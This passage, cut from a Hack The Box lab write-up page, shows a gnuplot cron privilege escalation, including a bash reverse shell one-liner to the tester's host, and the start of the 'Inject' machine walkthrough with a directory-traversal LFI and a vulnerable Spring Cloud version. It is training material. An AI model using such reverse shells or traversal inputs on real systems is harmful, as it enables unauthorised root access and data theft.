Pv9tDIepm0Fs0BjQmddoCMS6GlfLciXUTIyJWT4yJRr7YFDEq0llV59VKZ836Az4S2756w7YBAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="run pspy" title="" src="/static/a3a465944a310b40c4b5a61b05cd39ba/50637/run-pspy.png" srcset="/static/a3a465944a310b40c4b5a61b05cd39ba/dda05/run-pspy.png 158w, /static/a3a465944a310b40c4b5a61b05cd39ba/679a3/run-pspy.png 315w, /static/a3a465944a310b40c4b5a61b05cd39ba/50637/run-pspy.png 630w, /static/a3a465944a310b40c4b5a61b05cd39ba/0df09/run-pspy.png 707w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I noticed a process running every minute that executed any <code class="language-text">.plt</code> files within <code class="language-text">/opt/gnuplot</code> as <code class="language-text">root</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/d03c50e0cdaddfae350fcbfa6f55b6c4/f5514/gnuplot-process.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 48.10126582278481%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB7UlEQVR42lVS2Y7TQBD0r7AzQaydje0kvq84dhIn5D7IAoIFAosQPCDB/xc141W0PLSqPdOuqa5uo6jX8NMZiskG4WgNmXyEzC8Q7gyiv4AsfxEbCG8HmT5ADFeseWDNtxbTT8QPkE4FeTuEUVQkjCfIRw0CEovwPWR2gfyPcEGidUuQfYUc/WgfvMsYOUQ3gTB9SIYxbk6IihXK2R5RvnhGSFWDJeT4N5Hn3r5VEpy1Uhm9ZbyDDO/be9PTpEY1J+FohWp+RDLeQsSqncdW4YDt1X+Ir/nQuW1TYUyi6P4Z4VyTacJaERZLVM0BSbllMT0pvkOqNjXhX92uzsM3VMgoHluVyr+Ynnu8p3+asJie4Bcb5LMzwvERIvkMkX6hRw1uFGn5kzhvVQZHbYMITm2u1D0pvHFqvOjGMLLsgDhYIs/2iKM17MEOtrtEz0rR62awh5sWexXP57CdhjUb2HYNu886Z4qezhcYdHMYk3yL0bBCHZbEEn2S9Yc7uLx07/jNISh0zQSulV3Pr7nFMCO4r4bwGMa0OSLlUCb0Mh/v8DK9oMO1kFQj6VuHQ1Goc3/POKDDXe1whTqctM6DA6RaIbWHllPAdHLc9QtYRMnWhD2BsLhbbFXvm0Iz4A/tJMWt94T+dbpS3Zs+/gHc7E7wlS2ChAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="gnuplot process" title="" src="/static/d03c50e0cdaddfae350fcbfa6f55b6c4/50637/gnuplot-process.png" srcset="/static/d03c50e0cdaddfae350fcbfa6f55b6c4/dda05/gnuplot-process.png 158w, /static/d03c50e0cdaddfae350fcbfa6f55b6c4/679a3/gnuplot-process.png 315w, /static/d03c50e0cdaddfae350fcbfa6f55b6c4/50637/gnuplot-process.png 630w, /static/d03c50e0cdaddfae350fcbfa6f55b6c4/f5514/gnuplot-process.png 717w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Checking the permissions of <code class="language-text">/gnuplot</code>, showed that all users had write and execute permissions:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 434px; " > <a class="gatsby-resp-image-link" href="/static/3aad8472928d19ba8589269ca572dcf2/a7d84/gnuplot-permissions.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 22.151898734177216%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA8ElEQVR42lWOzU6DUBCF+ybGFqoUMAK3wgX5a6HYcm2FtOo7uHNn4rt/TqsbF18m50zmnJnMiyccM7LYDbjjG97+hHs44fdH/PQdVQzEWcdSuPFTps4Ds0XMzPlj8Z+JqgyFeWXZDgQrwzyucdIWN2uxgx2u2uAFOX5U4YUVlhzZnmbun0mZuQmW6PO8BOq8p24GlklHqFb4QYWKG/TjVryGON2gSyldH9CFQYmOZJfVhiBpubICru17prfqNzAr9zTdkax8FgyRloCip2xeSKQsr/eU8n29GS9+km/R4mVVj1qPpB9fFJ/f3HWjBIf8ANDmhtuug/1/AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="gnuplot permissions" title="" src="/static/3aad8472928d19ba8589269ca572dcf2/a7d84/gnuplot-permissions.png" srcset="/static/3aad8472928d19ba8589269ca572dcf2/dda05/gnuplot-permissions.png 158w, /static/3aad8472928d19ba8589269ca572dcf2/679a3/gnuplot-permissions.png 315w, /static/3aad8472928d19ba8589269ca572dcf2/a7d84/gnuplot-permissions.png 434w" sizes="(max-width: 434px) 100vw, 434px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Gnuplot is a command-line program used for plotting graphs, charts, and visualizations. A <code class="language-text">.plt</code> file which is used by gnuplot to execute scripts, can run system commands. So, I could write a custom <code class="language-text">.plt</code> script within the directory to get a <code class="language-text">root</code> shell.</p> <p>I started a Netcat listener:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 375px; " > <a class="gatsby-resp-image-link" href="/static/d6093705e67192e4278e3c5a2251e6bd/12d18/netcat.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 22.151898734177216%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA5UlEQVR42j2M2VLCQBBF+RSRyTKAopNlQhgQCCELEaFEoUSrfPb/3w8DUjx03a7ue07L7Q/x1BQRbBHhOyI62NwjHqf4A0Ne7aleDyzrTxbljs3ul7L5olwdWBQf1OsjffVCx4sRvqblPIyQyQapN/iqoDt6o5euWTZHhqZioGbotEDFGc/hHBVlPNkMdG4zIzErpHXchOPZmsl8a6ESM66ILRxa2EwaUlNbScYs3+L1Etyupu2E3LvhJdtuxJ0IbrKL8PvnDxVM6diCKy3kJwjv/+lc53x3pL4IhR9f59qR+rafhScFC4NgrIP5UAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="netcat" title="" src="/static/d6093705e67192e4278e3c5a2251e6bd/12d18/netcat.png" srcset="/static/d6093705e67192e4278e3c5a2251e6bd/dda05/netcat.png 158w, /static/d6093705e67192e4278e3c5a2251e6bd/679a3/netcat.png 315w, /static/d6093705e67192e4278e3c5a2251e6bd/12d18/netcat.png 375w" sizes="(max-width: 375px) 100vw, 375px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>In <code class="language-text">/opt/gnuplot</code>, I wrote a <code class="language-text">.plt</code> file that uses the <code class="language-text">system</code> gnuplot command to execute a reverse shell one-liner.</p> <p><code class="language-text">test.plt</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">system "bash -c 'bash -i >&amp; /dev/tcp/10.10.14.25/9001 0>&amp;1'"</code></pre></div> <p>Once the task ran, <code class="language-text">nc</code> caught a root shell:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/e8b46d7b3677a489525b09da54ed2532/0022c/root.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 56.9620253164557%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB1ElEQVR42mVSWXbiQBDzVVhtsxpv3d4XTAiEAHlz/7NoVAVhJjMfetXVYJWkasePByyzK3x7RdTcYcoT8uaCOHtTJNlR69hLMPFSjN0Eo3mkGCvCB2Y7IoBjqjOq/oa0OLJeUbSfyOsLIntAaAZkJE+Ld5732CU9gqRDmPZI+Lu7yp6wcJcGUzeEU5KgaD5RdjeSXdEMd9T7myot2wss6zbuSNRjE7asJOagDe8Wm4LIiByroMR8YeCIOiGVj9Zhg23U6ocz3xAWU9aJm9Lut+UYo1moGM9j9rzzDGEVjijIqhOCqOOUGot1CW9V8M/pk+gBIVbI2ZNzppgo7AuOYT4Zc1zvavhrsVBiua3Zt/DY++zlTtSO58ljiGsUo7koNj8Jxa4gYi4pN5rXH8xUsjujZhwyUDIO4p7ElQ6TAT6dLIMW/rb6SWhptyRBmO5JekDBDZcksMUJdXfls3lHXl207w6/GE2vZN6qZEQk3PxDKGpMflTLolJ6JaXqZn9nHI+zyU9ohy8sSSDWJUex/Z/lNBcF55fCjEpEjby5mH2YDEg4MLZvGskqaDTHKTc68zKtE+9vy9yyKOkISxVhTOJ0IMFBNz/7fjZPvLassH8In6S/AZr1ZB0RwLqBAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="root" title="" src="/static/e8b46d7b3677a489525b09da54ed2532/50637/root.png" srcset="/static/e8b46d7b3677a489525b09da54ed2532/dda05/root.png 158w, /static/e8b46d7b3677a489525b09da54ed2532/679a3/root.png 315w, /static/e8b46d7b3677a489525b09da54ed2532/50637/root.png 630w, /static/e8b46d7b3677a489525b09da54ed2532/0022c/root.png 655w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p>https://mgarrity.com/hack-the-box-inject/https://mgarrity.com/hack-the-box-inject/Fri, 07 Jul 2023 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/d76bf8a53acfafd45e724dbc77d7e7a5/3b67f/inject.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA+ElEQVR42mMQkdX+jxPLaf8Xltb+LyAOpGW0/4vK4VELxQy4JECaBSS0/kvIa/xX01f/Lw6kBSQIG8qA2zDt/xqmuv89irz+W1cm/fcs8PyvbqL7X0ASv6FYDRSW0fkvoaD536vQ87/TgiX/NTZt/u88c/5/n3w3oEs1/wuT5EKw63T+qxlq/LcriP4vOW/h/5JbK/4rzp/33y4j5L+KvtZ/QTyuxOFC7f/iilr/fTKd/6uU1P4X6un5r5Jb9t830+G/mIIWWJ6sMFQz1vnvk2b33zHO+79vqu1/VSNdghFDMJbF5LX+q+hBaLJjGdlQEC0ohcrHZyAAkUcFzuOba3UAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Inject" title="" src="/static/d76bf8a53acfafd45e724dbc77d7e7a5/50637/inject.png" srcset="/static/d76bf8a53acfafd45e724dbc77d7e7a5/dda05/inject.png 158w, /static/d76bf8a53acfafd45e724dbc77d7e7a5/679a3/inject.png 315w, /static/d76bf8a53acfafd45e724dbc77d7e7a5/50637/inject.png 630w, /static/d76bf8a53acfafd45e724dbc77d7e7a5/fddb0/inject.png 945w, /static/d76bf8a53acfafd45e724dbc77d7e7a5/3b67f/inject.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Inject is a Linux machine hosting a cloud storage and collaboration app built with Java and the Spring framework. A route on the app has a query parameter susceptible to LFI and can lead to the discovery of dependencies for the app, one of which is vulnerable to RCE (CVE-2022-22963) and can be leveraged to get a shell. Once on the system, enumeration can lead to user credentials within an XML file allowing for lateral movement. System monitoring with pspy reveals that an automated task periodically running on the machine attempts to execute any Ansible playbooks within the <code class="language-text">/opt/automation/tasks</code> directory. This can be exploited by writing a custom playbook containing a reverse shell command that when executed, leads to a root shell.</p> <p><code class="language-text">nmap</code> scan:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/b8718680268cc36b9bdaf8f76b8aed41/2fe53/nmap-scan.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 50.632911392405056%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB20lEQVR42mVSWXLbMBTTSTq1ndpaKGulFlKy1lhK4q1t7n8VFGJtTyf9wDySQ4LAw7M2XoF1OGEVvmHlNwhli6p5gzpMqAmpj3gRJdZOho2bG/y7/gorqU5Imp/I2isi9YqAhM1wMRjnT6TFCDvQ8NMWe9kRPdcdgqzH1lf/kVstH9ZU1HRnjNMnVHNG+/ob+eGEuJjgigw7N4W7L2ALifU2xMaRT6VfYVXdBZEcIRVtNiTvb9inA6LiiOF4Q1qOCPOB1ieeNyQuYXsSXqjhxdxHNdywhkhaOKxWpmbIcqa1GSLusBWaPxXYCQXXL/jgYLBcdszDDg5b4FDtzi/v55Wp9l7DskUFvShrb9DsY15/QHdXVO0Zad6hZK2GK+sJim3RxHLWs787kWNly6fdjZP/VVg1JCBJUZ9xGBlQ9Q7VXlAdZp7NSNTxGcYjkFTTEYNas5cvnJQHDGFRfSBT76aPSTnBi1r4tLbAY8+WQJzFPtci0lSS4tuPCN8f6uw7llBCBhBnHJdkQMC1IFnMQPZpb8IJGFiwkLOPAUOJOFaun0OEpQnGTxozTsHdgaVprRt/PUmTfEKYjrzYI8xGQxzn/ID7RXEgKaA88uMaL3aCrSs5jyUDUmYu/wDFm0aQd3MluwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nmap scan" title="" src="/static/b8718680268cc36b9bdaf8f76b8aed41/50637/nmap-scan.png" srcset="/static/b8718680268cc36b9bdaf8f76b8aed41/dda05/nmap-scan.png 158w, /static/b8718680268cc36b9bdaf8f76b8aed41/679a3/nmap-scan.png 315w, /static/b8718680268cc36b9bdaf8f76b8aed41/50637/nmap-scan.png 630w, /static/b8718680268cc36b9bdaf8f76b8aed41/2fe53/nmap-scan.png 674w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Ports open:</p> <ul> <li>22 (SSH)</li> <li>8080 (HTTP)</li> </ul> <p>A visit to the webpage on port 8080 showed a cloud app for storing and sharing files:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/cd134329f7746ca96a05e305dc993f13/ec8e1/home-page.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 46.835443037974684%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABCElEQVR42o2RW26DMBBF2XalqFVSkihdQhfT/vSjCwlQDAYCMgS/bj2mSZ1IlFo6YgbP3Hk4incHxPsDtgHP2/2Vp02Mh9Uaq8e1t8M7YhOye0GEhSPHEeehwzCcMTp76UTGGPxiobSGUgpSKlgtUXYGr28d3j8+cWpbH0d3BMXd5pt/dKiBY2VQNycYbZY7DB1rra96gU7fCzR1iaqq3NjDVETKawzlzApSQJ4zfDkYK/wIQggck9SReHuKyZEz5rnf640g7WUSzD20T15ypFnmfe66JEHykzRF5r5/ClJHlMRc5bppYNw4QvQoihKcTyNTDD1O+wP5s4IXUe06C3dD/+53Nfco37SfpWc98nFYAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="home page" title="" src="/static/cd134329f7746ca96a05e305dc993f13/50637/home-page.png" srcset="/static/cd134329f7746ca96a05e305dc993f13/dda05/home-page.png 158w, /static/cd134329f7746ca96a05e305dc993f13/679a3/home-page.png 315w, /static/cd134329f7746ca96a05e305dc993f13/50637/home-page.png 630w, /static/cd134329f7746ca96a05e305dc993f13/fddb0/home-page.png 945w, /static/cd134329f7746ca96a05e305dc993f13/f46b1/home-page.png 1260w, /static/cd134329f7746ca96a05e305dc993f13/ec8e1/home-page.png 1424w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The upload link at the top right of the page brought up a file upload form:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/5c73b5a42b74a7c6f45828f1affcb0a9/1b53c/upload-form.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 19.62025316455696%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAaElEQVR42mOIjI77HxWbAMcRQH5oRPT/kPAoBA6LgGBkMRyY4dfv3/8/fPz8/9u37/+/ff/+/9+/f/8pAQx///79//PXr/8gGoRRwD8I/9frff9/vdoJE8RvIH77IJr//XgOxE+JciEAksUWLYNN3xQAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="upload form" title="" src="/static/5c73b5a42b74a7c6f45828f1affcb0a9/50637/upload-form.png" srcset="/static/5c73b5a42b74a7c6f45828f1affcb0a9/dda05/upload-form.png 158w, /static/5c73b5a42b74a7c6f45828f1affcb0a9/679a3/upload-form.png 315w, /static/5c73b5a42b74a7c6f45828f1affcb0a9/50637/upload-form.png 630w, /static/5c73b5a42b74a7c6f45828f1affcb0a9/fddb0/upload-form.png 945w, /static/5c73b5a42b74a7c6f45828f1affcb0a9/f46b1/upload-form.png 1260w, /static/5c73b5a42b74a7c6f45828f1affcb0a9/1b53c/upload-form.png 1416w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After uploading an image, a link was provided to view it:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 538px; " > <a class="gatsby-resp-image-link" href="/static/d1f22ed17bb60f8081ef6156581b6ace/8522b/uploaded-link.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 46.202531645569614%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAsElEQVR42qVRiwrCMAzcV4kg/q3+haDoZ4ggG06n1E5x7bq1PZOCoOA6HwdHQtNc2lyCCJz3qJoaujVQFDn3dBZDEis2tsVa7LCVB2wopuURtk+QJ74jozIaWVkgvwrklxNSWYQhoHJXX6cg0zoLZRRUXRFvlGtag0OsJ+E9xfj8Q8777nfvkF4SjMknOC8GkMsRvJi91L4z5SG4n0LMh5Cr8Z+CP+IDQTbBBgZ7ewTv5gXDoBdlPnYAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="uploaded link" title="" src="/static/d1f22ed17bb60f8081ef6156581b6ace/8522b/uploaded-link.png" srcset="/static/d1f22ed17bb60f8081ef6156581b6ace/dda05/uploaded-link.png 158w, /static/d1f22ed17bb60f8081ef6156581b6ace/679a3/uploaded-link.png 315w, /static/d1f22ed17bb60f8081ef6156581b6ace/8522b/uploaded-link.png 538w" sizes="(max-width: 538px) 100vw, 538px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The link redirected to the following route with a query parameter containing the uploaded image:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">10.10.11.204:8080/show_image?img=test.png</code></pre></div> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/fa301e89b22314e9728414203c24a7a1/2657e/show-image.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 60.12658227848101%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAACyUlEQVR42m2TyU+TURRH+SdUFCl+tVDbbyyTRURxiIojEJRIFLACVRlKKyogQROjJoIyOotDjFMMDhsjuME4JC6MBoRKQQoOaNC4U1fm+KgxamDxS+7bnJx777thkiQhSWYszjSiUzeIrCd6UfbfpGZhWZCBJTVT1H+SQUwo6cQsEW/nYqRZsxhnhYUK82zU8jvohwMoNU+xVXdhq32M7cAz1MYB9NYR1KZ+tJbXovaL9GEcf4Wj9QVx5/rRd7UhRUWGxMIk6TdQL2rH2NONvKOTmPzrmNLrmL5sN1NScrFU3kM7M4bSMojS5BfgXvSWV+jNL3Gc6UfdOQnQyBPAkufIrk6sm25jzmjDlNbM9PmHmLHmEJa9HVj3PURpDaI2C0hTL1pTN8bpARTfeQE0/Q+Mzb1Lgm8EzfUEW3YHct5L1OIx7NveM21pFTM3NxC+bi/h6VXY63sENIDW2IN+ahDZd2GiYezGdhILA8Rt8RO/YwxH6ReMip9Err7M7KpO9CugnPyMqeAska4TqC1BlGM9aCeHkL0XJwLjM9pxFgRJKHxDrHsEY/sohu8H5uwupq2qxlLTRXTtIzHDYTHLEZSGAOpR0fbxIPbySxOBCZm3SNr6hoStwlIAHQKoi5Y17zfMWQ+IWNXIzKxGpi4pw5TfilzXJ4B9YkEC6JkEmJh+k3muAea6/CHLOPfbENQo/oTD+x3N8xW16h1yZQ8Raw9iLrmBdkzMsXkIe9lkwHXXSM7rxZnXTeI4tECYFg2F2ne4hzHcQ2hlfozaIDZPF1bffdQjouWGQezFFyZuOUkYLswPCGgfScLUWRhkbtFbEt0fREaJ3/6BuAphXSPmWzOAul/8w/pB8ck/Inuu/mv4+/SU+By05FLU5BKU+R6UlHLkFC/yAh/28aT6sC31MWe5lzkrvFhXerCuKcOaWUHM4hxxelGh0/sFVAH6KlgaruYAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="show image" title="" src="/static/fa301e89b22314e9728414203c24a7a1/50637/show-image.png" srcset="/static/fa301e89b22314e9728414203c24a7a1/dda05/show-image.png 158w, /static/fa301e89b22314e9728414203c24a7a1/679a3/show-image.png 315w, /static/fa301e89b22314e9728414203c24a7a1/50637/show-image.png 630w, /static/fa301e89b22314e9728414203c24a7a1/fddb0/show-image.png 945w, /static/fa301e89b22314e9728414203c24a7a1/2657e/show-image.png 1188w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I intercepted the request with Burp Suite:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/5020ea2d0fe53e1822eac9af3f7906fc/52df6/show-image-burp.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 29.746835443037973%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA8klEQVR42l1RW7bDIAjMeqLxrVFjEm/71/3vZwq2yem5HyMiMAMy1VoRvIfWBlJKLMsywHcpBZSLUFqjlIJ1TVAU0+Qrpb45EkIIhP5C2RomPv56x3l2eiDyNcL5CGMdwUJZj0Vp+BDwfDzR2o6QiNgYLExMjQywTyJTzgW1bohUkCjRUMASkbVm3DUlcQdMuB0nCuWWnD8xIuTYB/OwUy4VR3+MxEBFnsa/xmZcoznnhtDlX0TzPN8YhLUdaDQud5nSOghZ/X8Ri+37jkzdseVpYow3uI7FJl6GEPL+4N+P/iXkDltr3+Wsw/JCWeCyTPoGCwe+HPwfoHgAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="show image burp repeater" title="" src="/static/5020ea2d0fe53e1822eac9af3f7906fc/50637/show-image-burp.png" srcset="/static/5020ea2d0fe53e1822eac9af3f7906fc/dda05/show-image-burp.png 158w, /static/5020ea2d0fe53e1822eac9af3f7906fc/679a3/show-image-burp.png 315w, /static/5020ea2d0fe53e1822eac9af3f7906fc/50637/show-image-burp.png 630w, /static/5020ea2d0fe53e1822eac9af3f7906fc/fddb0/show-image-burp.png 945w, /static/5020ea2d0fe53e1822eac9af3f7906fc/52df6/show-image-burp.png 1007w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Then, I found an LFI vulnerability by passing in <code class="language-text">../</code> as the value to the parameter which responded with some files on the server:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/b2ee74632ee3f21a189290047ec5ae38/48cc5/directory-traversal-lfi.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 29.746835443037973%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA2UlEQVR42oWQa24DIQyEOc/yJmx2YR/ZNlHuf6OJB5qqVRTlxyeDPQy2VSkFKQZY62CMlWihtYY2RqKBixnOe1B3HkfRSM65Bs98o4cBabtj3b+g6rLi+ziw7RfwfMojfAhC7KRuONeK6/X2T8O886EjWus8VKkLiohH+Z0EEcYYWyTOmtbxNBfUdUcV/TRN8DSTLts0f1A02y9HGynnjJROvyMRPuQaaMK6Mf2DZ3wxXGTUdTswl94lH9GExUF2Q3hmLcqun/d3qBjTTyeh0Rf9+jtzn8xo+ABVP7uWttNKzgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="directory traversal LFI" title="" src="/static/b2ee74632ee3f21a189290047ec5ae38/50637/directory-traversal-lfi.png" srcset="/static/b2ee74632ee3f21a189290047ec5ae38/dda05/directory-traversal-lfi.png 158w, /static/b2ee74632ee3f21a189290047ec5ae38/679a3/directory-traversal-lfi.png 315w, /static/b2ee74632ee3f21a189290047ec5ae38/50637/directory-traversal-lfi.png 630w, /static/b2ee74632ee3f21a189290047ec5ae38/fddb0/directory-traversal-lfi.png 945w, /static/b2ee74632ee3f21a189290047ec5ae38/48cc5/directory-traversal-lfi.png 1005w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I traversed a couple more directories and found a <code class="language-text">pom.xml</code> file that contained some interesting app info (e.g. project metadata, configuration data, and dependencies). One of the dependencies being used to implement the cloud functionality, version 3.2.2 of Spring Cloud is vulnerable to remote code execution (CVE-2022-22963):</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/cf5cef1004d7872947d18fa66ca3031e/3b627/pom-xml.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 65.18987341772153%; position: relative; bottom: 0; left: 0; background-image: 